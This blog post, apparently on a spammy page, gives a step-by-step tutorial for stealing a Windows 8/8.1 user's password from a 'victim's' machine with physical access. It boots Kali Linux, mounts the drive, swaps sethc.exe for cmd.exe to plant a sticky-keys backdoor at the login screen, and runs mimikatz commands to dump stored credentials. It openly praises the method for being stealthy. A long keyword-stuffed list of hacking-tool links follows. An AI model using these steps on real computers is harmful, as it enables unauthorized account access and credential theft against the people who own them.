Clickbank Products

Tuesday, January 23, 2024

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

Related posts


  1. Pentest Tools Online
  2. Pentest Tools Linux
  3. Hacker Tool Kit
  4. Hack Tools
  5. Pentest Tools Port Scanner
  6. Hacking Tools Usb
  7. Hacker Tool Kit
  8. Computer Hacker
  9. Blackhat Hacker Tools
  10. Hack Website Online Tool
  11. Hacking Tools 2019
  12. Hacking Tools For Windows
  13. Pentest Tools Download
  14. Pentest Tools
  15. Hacking Tools Pc
  16. Best Hacking Tools 2019
  17. Hacking Tools For Mac
  18. Pentest Tools Alternative
  19. Hacker Tools For Mac
  20. Hacking Tools Usb
  21. Hacker Tools Free
  22. Hacker Tools For Windows
  23. New Hack Tools
  24. Pentest Tools Website
  25. Hacking Tools For Kali Linux
  26. Pentest Automation Tools
  27. Hacking Tools Windows
  28. Hack Apps
  29. Termux Hacking Tools 2019
  30. Pentest Tools Free
  31. Github Hacking Tools
  32. Easy Hack Tools
  33. Hacker Hardware Tools
  34. Pentest Tools Alternative
  35. Hack Tools
  36. Hack Tools For Windows
  37. Hacking Tools 2020
  38. Github Hacking Tools
  39. Hack Tools 2019
  40. Pentest Tools Download
  41. Hacking Tools
  42. Pentest Tools Website
  43. Hacker Tools 2019
  44. Tools Used For Hacking
  45. Hacker Tools Free Download
  46. Hacker Tools For Windows
  47. Github Hacking Tools
  48. Hacker Hardware Tools
  49. New Hack Tools
  50. Pentest Tools Alternative
  51. Best Pentesting Tools 2018
  52. Pentest Tools For Ubuntu
  53. Computer Hacker
  54. Hack Tools 2019
  55. World No 1 Hacker Software
  56. Hack Tool Apk
  57. New Hack Tools
  58. Hacking Tools Windows 10
  59. Hacker Tools List
  60. Hacker Hardware Tools
  61. Hacking Apps
  62. Best Pentesting Tools 2018
  63. Hacker Tools
  64. Hacking Tools For Kali Linux
  65. Bluetooth Hacking Tools Kali
  66. Pentest Tools Open Source
  67. Pentest Tools Online
  68. Hack Apps
  69. Hacker Security Tools
  70. Pentest Tools For Mac
  71. Hacking Tools Name
  72. Hacking App
  73. Hacking Tools 2020
  74. Pentest Tools For Ubuntu
  75. Hacking Tools Kit
  76. Growth Hacker Tools
  77. Hack Tools For Ubuntu
  78. Hacker Tools For Windows
  79. Physical Pentest Tools
  80. New Hack Tools
  81. Wifi Hacker Tools For Windows
  82. Pentest Box Tools Download
  83. Hacker Tools For Pc
  84. Hacking Tools For Kali Linux
  85. Pentest Tools Windows
  86. Hacker Tools Free
  87. What Are Hacking Tools
  88. Hacking Tools 2019
  89. Hack Apps
  90. Pentest Tools Subdomain
  91. Hacking Tools For Beginners
  92. Tools For Hacker
  93. Hack And Tools
  94. Hack Tools 2019
  95. Pentest Tools For Mac
  96. Pentest Tools Nmap
  97. Hacker Tools For Windows
  98. Pentest Tools Free
  99. Pentest Tools Github
  100. Pentest Reporting Tools
  101. Hacker Hardware Tools
  102. Pentest Tools For Mac
  103. Pentest Tools Kali Linux
  104. Hacking Tools Hardware
  105. Hacking Tools Free Download
  106. Pentest Tools Free
  107. Hacker Tools Online
  108. Hacking Tools And Software
  109. Pentest Tools For Windows
  110. Underground Hacker Sites
  111. Pentest Recon Tools
  112. Nsa Hacker Tools
  113. Hack Tool Apk
  114. Android Hack Tools Github
  115. Top Pentest Tools
  116. Hack Tools Online
  117. What Is Hacking Tools
  118. Free Pentest Tools For Windows
  119. Hack Tools
  120. Hack Rom Tools
  121. Pentest Reporting Tools
  122. Hacker Tools Mac
  123. Computer Hacker
  124. Hacking Tools Online
  125. Hacker Tools Apk Download
  126. Github Hacking Tools
  127. Pentest Tools Framework
  128. Hacker Tools 2020
  129. Pentest Tools Port Scanner
  130. Hacking Tools Name
  131. Hack Tools For Windows
  132. Tools 4 Hack
  133. Hack Tools Online
  134. Hack Tools
  135. Nsa Hacker Tools
  136. Usb Pentest Tools
  137. Hacking Tools For Windows Free Download
  138. Hacker Tools 2020
  139. Pentest Tools Port Scanner
  140. Pentest Tools Port Scanner
  141. Pentest Tools List
  142. Hacker Tool Kit
  143. New Hack Tools
  144. Hacker Tool Kit
  145. Hacking Tools Mac
  146. Hacker Tools For Pc
  147. Hack Tools Pc
  148. Game Hacking
  149. Tools Used For Hacking
  150. Hacking Tools Mac
  151. Hacker Tools Online
  152. Hacking Tools For Beginners
  153. Hack App
  154. Hacking Tools For Kali Linux
  155. Free Pentest Tools For Windows
  156. Hacking App
  157. Pentest Automation Tools
  158. Hack Tools 2019
  159. Hack Tools For Windows
  160. Hacker Tools Linux
  161. Hack Tools For Windows
  162. Underground Hacker Sites
  163. What Is Hacking Tools
  164. Tools Used For Hacking
  165. Best Hacking Tools 2020
  166. Pentest Tools Framework
  167. Hacking Tools And Software
  168. Hacker Tools Free
  169. Hack Tools Pc
  170. Tools For Hacker
  171. Hacker Tool Kit
  172. Pentest Tools For Android
  173. Hacking Tools For Pc
  174. Pentest Box Tools Download
  175. Hack Tools Online
  176. Physical Pentest Tools
  177. Pentest Tools Linux

No comments:

Post a Comment